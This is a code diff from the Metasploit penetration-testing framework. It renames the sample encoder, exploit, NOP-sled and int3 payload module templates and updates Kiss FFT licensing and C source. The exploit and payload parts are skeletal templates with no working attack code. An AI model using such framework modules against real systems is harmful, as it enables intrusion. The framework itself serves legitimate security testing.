|
|||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -1,24 +1,17 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
module Msf
|
||||
module Encoders
|
||||
|
||||
###
|
||||
#
|
||||
# This sample illustrates a very basic encoder that simply returns the block
|
||||
# that it's passed.
|
||||
#
|
||||
###
|
||||
class Sample < Msf::Encoder
|
||||
class Metasploit4 < Msf::Encoder
|
||||
|
||||
def initialize
|
||||
super(
|
||||
|
@ -40,6 +33,3 @@ class Sample < Msf::Encoder
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,25 +1,19 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# This exploit sample shows how an exploit module could be written to exploit
|
||||
# a bug in an arbitrary TCP server.
|
||||
#
|
||||
###
|
||||
class Exploits::Sample < Msf::Exploit::Remote
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
|
||||
#
|
||||
# This exploit affects TCP servers, so we use the TCP client mixin.
|
||||
|
@ -88,4 +82,3 @@ class Exploits::Sample < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -1,26 +1,19 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
module Nops
|
||||
|
||||
###
|
||||
#
|
||||
# This class implements a very basic NOP sled generator that just returns a
|
||||
# string of 0x90's.
|
||||
#
|
||||
###
|
||||
class Sample < Msf::Nop
|
||||
class Metasploit4 < Msf::Nop
|
||||
|
||||
def initialize
|
||||
super(
|
||||
|
@ -39,6 +32,3 @@ class Sample < Msf::Nop
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,26 +1,18 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
module Payloads
|
||||
module Singles
|
||||
|
||||
###
|
||||
#
|
||||
# This sample payload is designed to trigger a debugger exception via int3.
|
||||
#
|
||||
###
|
||||
module Sample
|
||||
module Metasploit4
|
||||
|
||||
include Msf::Payload::Single
|
||||
|
||||
|
@ -40,7 +32,3 @@ module Sample
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,30 +0,0 @@
|
|||
Kiss FFT library
|
||||
==================
|
||||
|
||||
Copyright (c) 2003-2006 Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
|
||||
Ruby wrapper layer
|
||||
==================
|
||||
|
||||
Copyright (C) 2009 H D Moore
|
||||
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
|
@ -0,0 +1,2 @@
|
|||
source "http://rubygems.org"
|
||||
gemspec
|
|
@ -0,0 +1,30 @@
|
|||
Kiss FFT library
|
||||
==================
|
||||
|
||||
|
||||
Copyright (c) 2003-2010 Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
Ruby wrapper layer
|
||||
==================
|
||||
|
||||
Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com >
|
||||
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
|
@ -1,150 +0,0 @@
|
|||
/*
|
||||
Copyright (c) 2003-2004, Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
*/
|
||||
|
||||
/* kiss_fft.h
|
||||
defines kiss_fft_scalar as either short or a float type
|
||||
and defines
|
||||
typedef struct { kiss_fft_scalar r; kiss_fft_scalar i; }kiss_fft_cpx; */
|
||||
#include "kiss_fft.h"
|
||||
#include <limits.h>
|
||||
|
||||
#define MAXFACTORS 32
|
||||
/* e.g. an fft of length 128 has 4 factors
|
||||
as far as kissfft is concerned
|
||||
4*4*4*2
|
||||
*/
|
||||
|
||||
struct kiss_fft_state{
|
||||
int nfft;
|
||||
int inverse;
|
||||
int factors[2*MAXFACTORS];
|
||||
kiss_fft_cpx twiddles[1];
|
||||
};
|
||||
|
||||
/*
|
||||
Explanation of macros dealing with complex math:
|
||||
|
||||
C_MUL(m,a,b) : m = a*b
|
||||
C_FIXDIV( c , div ) : if a fixed point impl., c /= div. noop otherwise
|
||||
C_SUB( res, a,b) : res = a - b
|
||||
C_SUBFROM( res , a) : res -= a
|
||||
C_ADDTO( res , a) : res += a
|
||||
* */
|
||||
#ifdef FIXED_POINT
|
||||
#if (FIXED_POINT==32)
|
||||
# define FRACBITS 31
|
||||
# define SAMPPROD int64_t
|
||||
#define SAMP_MAX 2147483647
|
||||
#else
|
||||
# define FRACBITS 15
|
||||
# define SAMPPROD int32_t
|
||||
#define SAMP_MAX 32767
|
||||
#endif
|
||||
|
||||
#define SAMP_MIN -SAMP_MAX
|
||||
|
||||
#if defined(CHECK_OVERFLOW)
|
||||
# define CHECK_OVERFLOW_OP(a,op,b) \
|
||||
if ( (SAMPPROD)(a) op (SAMPPROD)(b) > SAMP_MAX || (SAMPPROD)(a) op (SAMPPROD)(b) < SAMP_MIN ) { \
|
||||
fprintf(stderr,"WARNING:overflow @ " __FILE__ "(%d): (%d " #op" %d) = %ld\n",__LINE__,(a),(b),(SAMPPROD)(a) op (SAMPPROD)(b) ); }
|
||||
#endif
|
||||
|
||||
|
||||
# define smul(a,b) ( (SAMPPROD)(a)*(b) )
|
||||
# define sround( x ) (kiss_fft_scalar)( ( (x) + (1<<(FRACBITS-1)) ) >> FRACBITS )
|
||||
|
||||
# define S_MUL(a,b) sround( smul(a,b) )
|
||||
|
||||
# define C_MUL(m,a,b) \
|
||||
do{ (m).r = sround( smul((a).r,(b).r) - smul((a).i,(b).i) ); \
|
||||
(m).i = sround( smul((a).r,(b).i) + smul((a).i,(b).r) ); }while(0)
|
||||
|
||||
# define DIVSCALAR(x,k) \
|
||||
(x) = sround( smul( x, SAMP_MAX/k ) )
|
||||
|
||||
# define C_FIXDIV(c,div) \
|
||||
do { DIVSCALAR( (c).r , div); \
|
||||
DIVSCALAR( (c).i , div); }while (0)
|
||||
|
||||
# define C_MULBYSCALAR( c, s ) \
|
||||
do{ (c).r = sround( smul( (c).r , s ) ) ;\
|
||||
(c).i = sround( smul( (c).i , s ) ) ; }while(0)
|
||||
|
||||
#else /* not FIXED_POINT*/
|
||||
|
||||
# define S_MUL(a,b) ( (a)*(b) )
|
||||
#define C_MUL(m,a,b) \
|
||||
do{ (m).r = (a).r*(b).r - (a).i*(b).i;\
|
||||
(m).i = (a).r*(b).i + (a).i*(b).r; }while(0)
|
||||
# define C_FIXDIV(c,div) /* NOOP */
|
||||
# define C_MULBYSCALAR( c, s ) \
|
||||
do{ (c).r *= (s);\
|
||||
(c).i *= (s); }while(0)
|
||||
#endif
|
||||
|
||||
#ifndef CHECK_OVERFLOW_OP
|
||||
# define CHECK_OVERFLOW_OP(a,op,b) /* noop */
|
||||
#endif
|
||||
|
||||
#define C_ADD( res, a,b)\
|
||||
do { \
|
||||
CHECK_OVERFLOW_OP((a).r,+,(b).r)\
|
||||
CHECK_OVERFLOW_OP((a).i,+,(b).i)\
|
||||
(res).r=(a).r+(b).r; (res).i=(a).i+(b).i; \
|
||||
}while(0)
|
||||
#define C_SUB( res, a,b)\
|
||||
do { \
|
||||
CHECK_OVERFLOW_OP((a).r,-,(b).r)\
|
||||
CHECK_OVERFLOW_OP((a).i,-,(b).i)\
|
||||
(res).r=(a).r-(b).r; (res).i=(a).i-(b).i; \
|
||||
}while(0)
|
||||
#define C_ADDTO( res , a)\
|
||||
do { \
|
||||
CHECK_OVERFLOW_OP((res).r,+,(a).r)\
|
||||
CHECK_OVERFLOW_OP((res).i,+,(a).i)\
|
||||
(res).r += (a).r; (res).i += (a).i;\
|
||||
}while(0)
|
||||
|
||||
#define C_SUBFROM( res , a)\
|
||||
do {\
|
||||
CHECK_OVERFLOW_OP((res).r,-,(a).r)\
|
||||
CHECK_OVERFLOW_OP((res).i,-,(a).i)\
|
||||
(res).r -= (a).r; (res).i -= (a).i; \
|
||||
}while(0)
|
||||
|
||||
|
||||
#ifdef FIXED_POINT
|
||||
# define KISS_FFT_COS(phase) floor(.5+SAMP_MAX * cos (phase))
|
||||
# define KISS_FFT_SIN(phase) floor(.5+SAMP_MAX * sin (phase))
|
||||
# define HALF_OF(x) ((x)>>1)
|
||||
#elif defined(USE_SIMD)
|
||||
# define KISS_FFT_COS(phase) _mm_set1_ps( cos(phase) )
|
||||
# define KISS_FFT_SIN(phase) _mm_set1_ps( sin(phase) )
|
||||
# define HALF_OF(x) ((x)*_mm_set1_ps(.5))
|
||||
#else
|
||||
# define KISS_FFT_COS(phase) (kiss_fft_scalar) cos(phase)
|
||||
# define KISS_FFT_SIN(phase) (kiss_fft_scalar) sin(phase)
|
||||
# define HALF_OF(x) ((x)*.5)
|
||||
#endif
|
||||
|
||||
#define kf_cexp(x,phase) \
|
||||
do{ \
|
||||
(x)->r = KISS_FFT_COS(phase);\
|
||||
(x)->i = KISS_FFT_SIN(phase);\
|
||||
}while(0)
|
||||
|
||||
|
||||
/* a debugging function */
|
||||
#define pcpx(c)\
|
||||
fprintf(stderr,"%g + %gi\n",(double)((c)->r),(double)((c)->i) )
|
|
@ -0,0 +1,164 @@
|
|||
/*
|
||||
Copyright (c) 2003-2010, Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
*/
|
||||
|
||||
/* kiss_fft.h
|
||||
defines kiss_fft_scalar as either short or a float type
|
||||
and defines
|
||||
typedef struct { kiss_fft_scalar r; kiss_fft_scalar i; }kiss_fft_cpx; */
|
||||
#include "kiss_fft.h"
|
||||
#include <limits.h>
|
||||
|
||||
#define MAXFACTORS 32
|
||||
/* e.g. an fft of length 128 has 4 factors
|
||||
as far as kissfft is concerned
|
||||
4*4*4*2
|
||||
*/
|
||||
|
||||
struct kiss_fft_state{
|
||||
int nfft;
|
||||
int inverse;
|
||||
int factors[2*MAXFACTORS];
|
||||
kiss_fft_cpx twiddles[1];
|
||||
};
|
||||
|
||||
/*
|
||||
Explanation of macros dealing with complex math:
|
||||
|
||||
C_MUL(m,a,b) : m = a*b
|
||||
C_FIXDIV( c , div ) : if a fixed point impl., c /= div. noop otherwise
|
||||
C_SUB( res, a,b) : res = a - b
|
||||
C_SUBFROM( res , a) : res -= a
|
||||
C_ADDTO( res , a) : res += a
|
||||
* */
|
||||
#ifdef FIXED_POINT
|
||||
#if (FIXED_POINT==32)
|
||||
# define FRACBITS 31
|
||||
# define SAMPPROD int64_t
|
||||
#define SAMP_MAX 2147483647
|
||||
#else
|
||||
# define FRACBITS 15
|
||||
# define SAMPPROD int32_t
|
||||
#define SAMP_MAX 32767
|
||||
#endif
|
||||
|
||||
#define SAMP_MIN -SAMP_MAX
|
||||
|
||||
#if defined(CHECK_OVERFLOW)
|
||||
# define CHECK_OVERFLOW_OP(a,op,b) \
|
||||
if ( (SAMPPROD)(a) op (SAMPPROD)(b) > SAMP_MAX || (SAMPPROD)(a) op (SAMPPROD)(b) < SAMP_MIN ) { \
|
||||
fprintf(stderr,"WARNING:overflow @ " __FILE__ "(%d): (%d " #op" %d) = %ld\n",__LINE__,(a),(b),(SAMPPROD)(a) op (SAMPPROD)(b) ); }
|
||||
#endif
|
||||
|
||||
|
||||
# define smul(a,b) ( (SAMPPROD)(a)*(b) )
|
||||
# define sround( x ) (kiss_fft_scalar)( ( (x) + (1<<(FRACBITS-1)) ) >> FRACBITS )
|
||||
|
||||
# define S_MUL(a,b) sround( smul(a,b) )
|
||||
|
||||
# define C_MUL(m,a,b) \
|
||||
do{ (m).r = sround( smul((a).r,(b).r) - smul((a).i,(b).i) ); \
|
||||
(m).i = sround( smul((a).r,(b).i) + smul((a).i,(b).r) ); }while(0)
|
||||
|
||||
# define DIVSCALAR(x,k) \
|
||||
(x) = sround( smul( x, SAMP_MAX/k ) )
|
||||
|
||||
# define C_FIXDIV(c,div) \
|
||||
do { DIVSCALAR( (c).r , div); \
|
||||
DIVSCALAR( (c).i , div); }while (0)
|
||||
|
||||
# define C_MULBYSCALAR( c, s ) \
|
||||
do{ (c).r = sround( smul( (c).r , s ) ) ;\
|
||||
(c).i = sround( smul( (c).i , s ) ) ; }while(0)
|
||||
|
||||
#else /* not FIXED_POINT*/
|
||||
|
||||
# define S_MUL(a,b) ( (a)*(b) )
|
||||
#define C_MUL(m,a,b) \
|
||||
do{ (m).r = (a).r*(b).r - (a).i*(b).i;\
|
||||
(m).i = (a).r*(b).i + (a).i*(b).r; }while(0)
|
||||
# define C_FIXDIV(c,div) /* NOOP */
|
||||
# define C_MULBYSCALAR( c, s ) \
|
||||
do{ (c).r *= (s);\
|
||||
(c).i *= (s); }while(0)
|
||||
#endif
|
||||
|
||||
#ifndef CHECK_OVERFLOW_OP
|
||||
# define CHECK_OVERFLOW_OP(a,op,b) /* noop */
|
||||
#endif
|
||||
|
||||
#define C_ADD( res, a,b)\
|
||||
do { \
|
||||
CHECK_OVERFLOW_OP((a).r,+,(b).r)\
|
||||
CHECK_OVERFLOW_OP((a).i,+,(b).i)\
|
||||
(res).r=(a).r+(b).r; (res).i=(a).i+(b).i; \
|
||||
}while(0)
|
||||
#define C_SUB( res, a,b)\
|
||||
do { \
|
||||
CHECK_OVERFLOW_OP((a).r,-,(b).r)\
|
||||
CHECK_OVERFLOW_OP((a).i,-,(b).i)\
|
||||
(res).r=(a).r-(b).r; (res).i=(a).i-(b).i; \
|
||||
}while(0)
|
||||
#define C_ADDTO( res , a)\
|
||||
do { \
|
||||
CHECK_OVERFLOW_OP((res).r,+,(a).r)\
|
||||
CHECK_OVERFLOW_OP((res).i,+,(a).i)\
|
||||
(res).r += (a).r; (res).i += (a).i;\
|
||||
}while(0)
|
||||
|
||||
#define C_SUBFROM( res , a)\
|
||||
do {\
|
||||
CHECK_OVERFLOW_OP((res).r,-,(a).r)\
|
||||
CHECK_OVERFLOW_OP((res).i,-,(a).i)\
|
||||
(res).r -= (a).r; (res).i -= (a).i; \
|
||||
}while(0)
|
||||
|
||||
|
||||
#ifdef FIXED_POINT
|
||||
# define KISS_FFT_COS(phase) floor(.5+SAMP_MAX * cos (phase))
|
||||
# define KISS_FFT_SIN(phase) floor(.5+SAMP_MAX * sin (phase))
|
||||
# define HALF_OF(x) ((x)>>1)
|
||||
#elif defined(USE_SIMD)
|
||||
# define KISS_FFT_COS(phase) _mm_set1_ps( cos(phase) )
|
||||
# define KISS_FFT_SIN(phase) _mm_set1_ps( sin(phase) )
|
||||
# define HALF_OF(x) ((x)*_mm_set1_ps(.5))
|
||||
#else
|
||||
# define KISS_FFT_COS(phase) (kiss_fft_scalar) cos(phase)
|
||||
# define KISS_FFT_SIN(phase) (kiss_fft_scalar) sin(phase)
|
||||
# define HALF_OF(x) ((x)*.5)
|
||||
#endif
|
||||
|
||||
#define kf_cexp(x,phase) \
|
||||
do{ \
|
||||
(x)->r = KISS_FFT_COS(phase);\
|
||||
(x)->i = KISS_FFT_SIN(phase);\
|
||||
}while(0)
|
||||
|
||||
|
||||
/* a debugging function */
|
||||
#define pcpx(c)\
|
||||
fprintf(stderr,"%g + %gi\n",(double)((c)->r),(double)((c)->i) )
|
||||
|
||||
|
||||
#ifdef KISS_FFT_USE_ALLOCA
|
||||
// define this to allow use of alloca instead of malloc for temporary buffers
|
||||
// Temporary buffers are used in two case:
|
||||
// 1. FFT sizes that have "bad" factors. i.e. not 2,3 and 5
|
||||
// 2. "in-place" FFTs. Notice the quotes, since kissfft does not really do an in-place transform.
|
||||
#include <alloca.h>
|
||||
#define KISS_FFT_TMP_ALLOC(nbytes) alloca(nbytes)
|
||||
#define KISS_FFT_TMP_FREE(ptr)
|
||||
#else
|
||||
#define KISS_FFT_TMP_ALLOC(nbytes) KISS_FFT_MALLOC(nbytes)
|
||||
#define KISS_FFT_TMP_FREE(ptr) KISS_FFT_FREE(ptr)
|
||||
#endif
|
|
@ -0,0 +1,408 @@
|
|||
/*
|
||||
Copyright (c) 2003-2010, Mark Borgerding
|
||||
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
|
||||
* Neither the author nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
*/
|
||||
|
||||
|
||||
#include "_kiss_fft_guts.h"
|
||||
/* The guts header contains all the multiplication and addition macros that are defined for
|
||||
fixed or floating point complex numbers. It also delares the kf_ internal functions.
|
||||
*/
|
||||
|
||||
static void kf_bfly2(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
const kiss_fft_cfg st,
|
||||
int m
|
||||
)
|
||||
{
|
||||
kiss_fft_cpx * Fout2;
|
||||
kiss_fft_cpx * tw1 = st->twiddles;
|
||||
kiss_fft_cpx t;
|
||||
Fout2 = Fout + m;
|
||||
do{
|
||||
C_FIXDIV(*Fout,2); C_FIXDIV(*Fout2,2);
|
||||
|
||||
C_MUL (t, *Fout2 , *tw1);
|
||||
tw1 += fstride;
|
||||
C_SUB( *Fout2 , *Fout , t );
|
||||
C_ADDTO( *Fout , t );
|
||||
++Fout2;
|
||||
++Fout;
|
||||
}while (--m);
|
||||
}
|
||||
|
||||
static void kf_bfly4(
|
||||
kiss_fft_cpx * Fout,
|
||||
const size_t fstride,
|
||||
const kiss_fft_cfg st,
|
||||
const size_t m
|
||||
)
|
||||
{
|
||||
kiss_fft_cpx *tw1,*tw2,*tw3;
|
||||
kiss_fft_cpx scratch[6];
|
||||
size_t k=m;
|
||||
const size_t m2=2*m;
|
||||
const size_t m3=3*m;
|
||||
|
||||
|
||||
tw3 = tw2 = tw1 = st->twiddles;
|
||||
|
||||
do {
|
||||
C_FIXDIV(*Fout,4); C_FIXDIV(Fout[m],4); C_FIXDIV(Fout[m2],4); C_FIXDIV(Fout[m3],4);
|
||||
|
||||
C_MUL(scratch[0],Fout[m] , *tw1 );
|
||||
C_MUL(scratch[1],Fout[m2] , *tw2 );
|
||||
C_MUL(scratch[2],Fout[m3] , *tw3 );
|
||||
|
||||
C_SUB( scratch[5] , *Fout, scratch[1] );
|
||||
C_ADDTO(*Fout, scratch[1]);
|
||||
C_ADD( scratch[3] , scratch[0] , scratch[2] );
|
||||
C_SUB( scratch[4] , scratch[0] , scratch[2] );
|
||||
C_SUB( Fout[m2], *Fout, scratch[3] );
|
||||
tw1 += fstride;
|
||||
tw2 += fstride*2;
|
||||
tw3 += fstride*3;
|
||||
C_ADDTO( *Fout , scratch[3] );
